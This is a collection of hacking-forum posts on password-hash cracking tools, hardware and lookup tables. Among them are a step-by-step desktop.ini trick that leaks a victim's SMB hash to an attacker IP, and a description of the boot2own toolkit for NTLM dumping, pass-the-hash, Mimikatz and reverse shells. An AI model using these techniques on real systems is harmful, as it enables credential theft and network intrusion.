Search the Community

Hi all, I have myself a stack of various routers; an old BT Hub 2, Hub 6, an original TALKTALK router, some random router that looks like it's from the 90's (I forget the model), etc. People give me their old stuff to play with because they know I'm a massive nerd in my spare time Pentesting the router password hash is easy enough with Aircrack, however I can't find much information about how one goes about capturing the admin password hash of a router (or plain text, if it's old and crappy like the random router I suspect may be!) So a basic question; What tools / methods are used for capturing admin router passwords? I plan on having a play with each router over the weekend. I did an online search for information, but the search just yielded lots of rubbish news articles with no actual useful information. Thanks guys.

Pumped to build a new CUDA Cracking beast. Anyone have suggestions on cooling and power consumption? I've got 2 Nvidia GeForce GTX 1080 Founders Editions. Can I run both SLI on a 600w power supply or should I use the 750? I have the AMD FX Black Edition 8-Core processor as well.

So yesterday I was battling to compile john but with that out of the way the rar file that I need to crack is doing some funny things. When running 'rar2john rarfile.rar > rarfile.hash' : rarfile.hash is bigger than the rarfile.rar. 6.8gb big. rarfile.rar contains a textfile with no data in (0kb) and another file (+-3gb). When running 'rar2john test.rar > test.hash': it produces one line with a hash that john can use and start cracking. test.hash contains a text file with no data in (0kb) and a text file with some data in. I thought it could be the 0kb text file seeing as the crc will always match when extracting it and any password will be able to extract it. But that does not seem to be it seeing as test.hash contains a single hash. Any ideas?

After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-235 Save the desktop.ini as Unicode or UTF-8 file Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini Preparation -> Done Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.

I have a bit of an odd question that I'm hoping someone here can point me in the right direction to figure out. I have been looking at a DVR which I purchased for the express purpose of poking around on. I was able to gain access to it via telnet, and found some interesting things. I found the password hashes for the web portal. The passwords themselves are hashed using an algorithm detected by JTR as "dahua". Outside of the source code for the JTR module located at http://fossies.org/linux/john/src/dahua_fmt_plug.c I cannot find any information about how this algorithm works. I spent several hours using my google-fu, but I haven't found anything yet. Here is what I have so far from reading the source code from above: The password is hashed using MD5, then compressed using the compress method included above. I don't know C well enough to be able to translate the rest of it, but that seems to be 99% of the work. I am getting hashes in the correct format using the code posted below, but they aren't correct. The code from the JTR module expects a 16 character hash, but MD5 returns a 32 character hash. I am quite rusty on C/C++, but I'm having a really hard time understanding the flow of the C program of the JTR module, particularly with pointers, and memory allocations. I know my python file has some errors in it, because it wasn't until I started writing this that I realized it was only checking the first 16 characters of the hash, not the full 32. It doesn't matter because the compressor as written only reduces the length by 2 anyway. dahua_hash.py

Hi all, I can search this question on the internet and find the occasional useful byte of information, but most of it's a bit rubbish. Plus, I'd like to get some direct opinions. How would you personally go about setting up an affordable (say, less than $1500) Password hash cracking machine? For example; A computer packed with loads of cheap GPUs? But which ones? A Raspberry Pi cluster? Pay a service to do it for you? If so, what services are available? Other? Thanks. *edited* My spelling and grammar is always terrible because I type too fast.

Hello, I want to test the strength of passwords. Assuming I have the password-cracking skills/tools of an average hacker, I want to turn the passwords into hashes and then try to crack them. This will give me a realistic picture of how strong they are. My question is: How do I turn the passwords into hashes? Does it matter what hashing algorithm I use? Thanks Nicholas

I got a question, I'm trying to find more info on oclhashcat on drivers I read that it's only available for nvidia, but I'm also trying to find drivers for or if anyone knows away around for intel corporation mobile gm965/gl960.

So I came up with a fun way to look up hashes. This is what I came up with. You can write the hash / plaintext pairs to individual files named for the hash but without a .txt file extension. So the file looks something like this. 7dff371b14986821e1778231479afdf93e698fa0 donkeypuncher And the filename is something like this: 7dff371b14986821e1778231479afdf93e698fa0 Here's a simple script that does this with sha1 hashes. This could pretty much be any hash type. #!/bin/bash cat all.txt | while read line do echo $line | openssl sha1 |sed -e "s/(stdin)= //g" > temp1.txt echo $line > temp2.txt cat temp1.txt temp2.txt > temp3.txt donkey=$(head -n 1 temp3.txt) cat temp3.txt > "${donkey}" rm temp1.txt temp2.txt temp3.txt done So basically you read through the wordlist and create a plaintext hash pair file for every plaintext in the list. An easy result. cd into the directory where you stored your hashes and cat out the hash. That simple almost zero lookup time because you're just calling a file. Cooler still is you can upload them to a web server and you or anyone else can lookup hashes in a web browser. Just type in the address. yoursite/hashtype/hash If you get a hit it's your plainext/hash pair. If it's not in your dictionary you get a 404 error. Or for extra added awesomeness you can create an HTML file for each with propper titles, tags, etc. Make a site map and pretty soon people will be able to lookup your hashes on Google. The cool thing here is you don't have to cat sort sed nawk grep split or generate new tables when you add words. You just more your new text hash pair files into the directory where you have them stored. You can skip or overwrite the existing and store the new files with little hassle. As an added bonus all of your friends can use your lookup files. The main problem I'm running into is hosting. I'm looking for cheap host that will let me pretty much store unlimitted files. If you are interested in working on something like this hit me up.

Hey guys, I'm new to the hacking scene, been doing small tests like using metasploit, imbedding meterpreter sessions and ssh'ing into machines for fun. But I've recently focused on Wi-Fi hacking, and been having alot of fun with it. But however, I've come across this one hash that does not want to go down. No matter how many wordlists I throw at it, not matter how many different combination rules I throw at it, this hash REFUSES to bite the bullet and just give in. So, like any responsible penetration tester, I've decided to turn to the group's forum that got me interested in hacking in the first place. If anyone wants to try their hand at cracking it, I can send it via Skype, just ask for my contact info. Thanks!

Hello, I'm trying to teach myself John the ripper and hashcat, I cant crack this at all. Tried 40 different wordlists (totaling 120GB), 20 different types hashes. What am I doing wrong. I want someone to tell me how to properly crack this stuff, I don't want a simple hand out. The tutorials online and hash-cat site are not yielding any results. When I use hash id it says SHA-1.So I've done that and a number of other ones. I wonder if my wordlist. Can anyone help. Example set: d9081cc033ac2c19afe3ff8cf453946c12448422 f47f25c081e912826f3e14c1096e38d1f4dd2b43 afdc1c9439966fd0a314ee237c7338e871f59d7d ea4a493b6dd029de9f014848b68d7a55fad95437 2b62c635f72be4242fff4b1717504e5c7df80b3b ed879ab939c2d4e4afdf24f09f8946f2509366de f7a5d996f8221f4c5080f5326a915ce0a9b2d6e1 ef23bcefbc3cfe63d3bff54d9d606d3d2e4eea32 0febac796bfc2f86c74cc1c0875add0fe4e1c670 d1a0c716884144c47937a6fbee49390ac8fb33d1 Thanks

After looking around, it seem this forum seems pretty balanced morally but also innovative. So I decided to present this toolkit here. It's started out as something simple but grew quickly. let me know if it has any bug's and what you think of this, thoughts opinions. I know there will be many typos. It's on git hub as the repo boot2own under user xor-function. github(dot)com / xor-function / boot2own The contents of the ABOUT file Apologies in advance is this is not the proper place for this. SUMMARY B2O is a toolkit that generates a live OS from a crunchbang iso. From this live environment attacks are performed on the HDD to gain NTLM hashes to leverage in additional attacks against a network. Used crunchbang-11-20130506-i686.iso successfully to generate liveCD. Used Ubuntu Server x86 12.04 successfully to compile patched winexe So use Ubuntu Server/Desktop x86 12.04 to compile binary for i686 crunchbang iso. Tested only on Hard drive with Windows 7 installed SHELL SCRIPTS: b2o-compile.sh compiles the patch winexe binaries that allow hash passing b2o-isogen.sh uses a crunchbang iso to generate a remastered iso live OS (B2O) with the automated attack tools. b2o-pxe.sh Creates a pxe server that serves the remastered B2O live OS. b2o-listener.sh starts a meterpreter listener with the configured options to msfconsole, use with option 3 in the B2O live OS. (Requires Metaspliot to be installed along with system_migrate.rb) b2o-autopwn.sh Attack engine, this script only runs in the live OS environment and provides a terminal menu with automated attack options. LIVE OS: The live OS chosen is CrunchBang Linux (I like it) The live filesystem is a squashfs filesystem. To remaster/mod it install squashfs-tools and genisoimage. To make a live USB use Unetbootin as the dd method fails. The expanded filesystem.squashfs was mounted an chrooted into to install the following packages: arp-scan lighttpd The core files that make the B2O live environment: root │ └─ boot-2-own ├── boot2own-autopwn.sh ├── creddump │ ├── cachedump.py │ ├── CHANGELOG │ ├── COPYING │ ├── framework │ ├── lsadump.py │ ├── pwdump.py │ └── README ├── CREDITS-B2O └── pwinexe A terminator shell is loaded on boot by modding (/etc/skel/.config/openbox/autostart) the following line was appended to the autostart file: -------------------------------------------------------------------------------------------------------------------- terminator --geometry=750x600 -e 'sudo /bin/bash -c /root/boot-2-own/b2o-autopwn.sh' & -------------------------------------------------------------------------------------------------------------------- Once B2O is booted up on a domain computer it boot2own-autopwn.sh automatically mounts the hard drive and then reads the local hashes using creddump (written by Brendan Dolan-Gavitt). Booting a live OS on a computer can be done by a USB device but a more promising method is PXE. This is practical as it is simple to make an arm SoC (beagle bone/Rasp Pi) serve B2O over PXE. Also there is no need to leave any physical media attached to the used PC after the OS is loaded into RAM. Once booted it singles out the local administration user name and it's corresponding NTLM hash and imports these as variables. Winexe is the one of the only programs that enable cli interaction with Windows computers from Linux. Unlike Psexec it does not pass hashes I used the samba-hashpass.patch from the smbexec project (Eric Milam & Martin Bos) and created a custom build/compile script to create a patched winexe binary (rename to pwinexe to prevent confusion). Now the user and hash variables can then be passed to a function using pwinexe for additional machine access. The patched winexe also has the option to run as SYSTEM along with the option to uninstall itself from the machine upon command completion. POST EXPLOITATION Once the local admin username and hash are retrieved boot2own-autopwn.sh it acquires the ip address of other computers in the LAN using arp-scan. Once this is done you are presented with payload options for pwinexe. I chose powershell as the attacks can be completely in memory. This makes forensics and IR quite difficult especially since the attack platform itself is in memory (boot disk/PXE). This seems to be the least likely method to be caught by AV solutions. Although to reduce the chance of detection further one can try obfuscation, base64 encoding after adding unused random variables into the command string. The PS payloads used in B2O are Invoke-Mimikatz (written by Joe Bialek) and Invoke-Shellcode (written by Matthew Graeber) both are part of PowerSploit. More details about theses scripts are located in the credits. To use these payloads without writing to disk, they must not be copied over prior to use. To insure the powershell payloads are only run in memory I employed a lighttpd web server to host the payloads. Now they can be retrieved and copied to an expression or variable in memory before execution. The Auto-Off option: This is an optional feature that powers off the live OS Session after a selected payload finishes performing an execution run on the detected IP's in the LAN. This can be useful as one can turn off the monitor then leave and let the live OS session power itself off after it finishes it's run. Invoke-Mimikatz reflectively loads Mimikatz in memory using powershell allowing the ability to acquire plain text passwords the results are copied to the file /root/loot in the B2O live file system To rsync/http-put-get through tor/i2p/etc.. this file to an external server just append the necessary code before the while loop ends at the bottom of boot2own-autopwn.sh. Invoke-Shellcode makes it possible to have reverse system shells connect to the specified IP or domain. It depends on MSF windows/meterpreter/reverse_https shell multi handler. It also depends on a modified version of smart_migrate, a Metasploit manage module. The modified module is named system_migrate.rb and is included in the folder. It's priority is to migrate out of powershell to an existing NT AUTHORITY/ SYSTEM process to maintain this permissions level. If it is not able to migrate out of powershell the patched winexe process will hang as powershell remains active. CAVEATS All of the following parameters must exist for success. The victim network IT Department uses the local administrator user account on domain computers. There is no hard disk encryption being used on the selected workstation. Their workstations boot to PXE or their BIOS is unlocked.

I have a pretty good idea how to write out hash/string pairs in from a wordlist or with nested loops in C++. I'm fine with saving this stuff to a text file because I've been loading the stuff into MySQL tables so I can search for them easily. But I was curious about how one goes about creating rainbow tables. I want to write my own lookup tables mostly for a better understanding of how they work but l also want to customize the way the program looks up a hash. Can I just convert a delimitted text file to .rt or .rtc? Basically I have figured out how to write out texts and hash but I want to take it a little further with a way to put them into a lookup table and index the memory locations into a hierarchical structure kinda like you would do with hyperlinks on a web site. So for example my hash is something like ZzaFDGwfhi423i9E7xz81a... it will start searching at ZzFD... instead of searching through the entire table starting at AAAA or whatever. Also do table lookups already do this. I would think someone else has already thought of something like this an implemented it. It seems like using the memory locations for certain strings as starting points would cut the search time exponentially. I really don't know that much about lookup tables to begin know what the best way of going about this. Can anybody point me in the way of some suggested reading on the subject? Here's some simplified examples of what I've been doing. //Simple example that converts a wordlist from plaintext to plaintext and hash pair tab delimited. #include <string> #include <sstream> #include <iostream> #include <cctype> #include <fstream> #include "md5.h" using namespace std; int main () { string line; ifstream infile ("/path/file.txt"); if (infile.is_open()) { while ( getline (infile,line) ) cout << line << char(9) << md5(line) << endl; infile.close(); } else cout << "Unable to open file"; return 0; } Might be wrong I just grabbed a bunch of stuff and copy pasted from some of my source without including a lot. //Simple version of a string generator that uses nested loops to run through and echo out strings in order like brute force. #include <iostream> using namespace std; int d = 0; int main() { for (int a = 97; a <= 122; a++) { for (int b = 97; b <= 122; b++) { for (int c = 97; c <= 122; c++) { for (int d = 97; d <= 122; d++) { //only does four characters if you want more make more loops. cout << char(a) << char(b) << char(c) << char(d) << endl; } } } } return 0; }

I recently released an attack on the iterative use of hashing functions. Here is a link to my blog post about it. http://ballastsec.blogspot.com/2012/07/transferable-state-attack-on-iterated.html This attack has proved to be faster than jtr at cracking Password Safe hashes, taking only 90% of the time it takes.

So recently my buddy and me started poking holes in some password safe systems(like KeePass). I made a blog post about most of these could easily be defeated by adding a WndProc listener to the clipboard, and watching for passwords as they get copied and pasted. That post is here: http://ballastsec.blogspot.com/2012/07/insecurity-in-password-management.html Not all of the password safe systems use this method, or have alternative methods as well. So the best way to attack these safes is to crack the safe. Currently, I have only implemented a safe cracker for Password Safe(http://passwordsafe.sourceforge.net/) after doing a light analysis then spending a lot of fun time making a dictionary cracker for it. Blog post about it here: http://ballastsec.blogspot.com/2012/07/auditing-of-password-safe-continues.html You can also find the source code that I've released so far here: https://github.com/bwall/SafeCracker/ and finally find the tarball of the latest version with a nice little Makefile here: https://github.com/downloads/bwall/SafeCracker/safe-cracker.tar.gz safe-cracker has currently only been tested in a Linux environment, if you really wanted to compile it on Windows, you would need the pthread library. If I were you though, I would wait until I finish implementing OpenCL into the cracker, as I will supply a compiled copy for Windows. What I would like to know is, what other password safe systems would you want audited? I want to add a few to this project, and hopefully start pushing development towards cracking more state of the art hashes.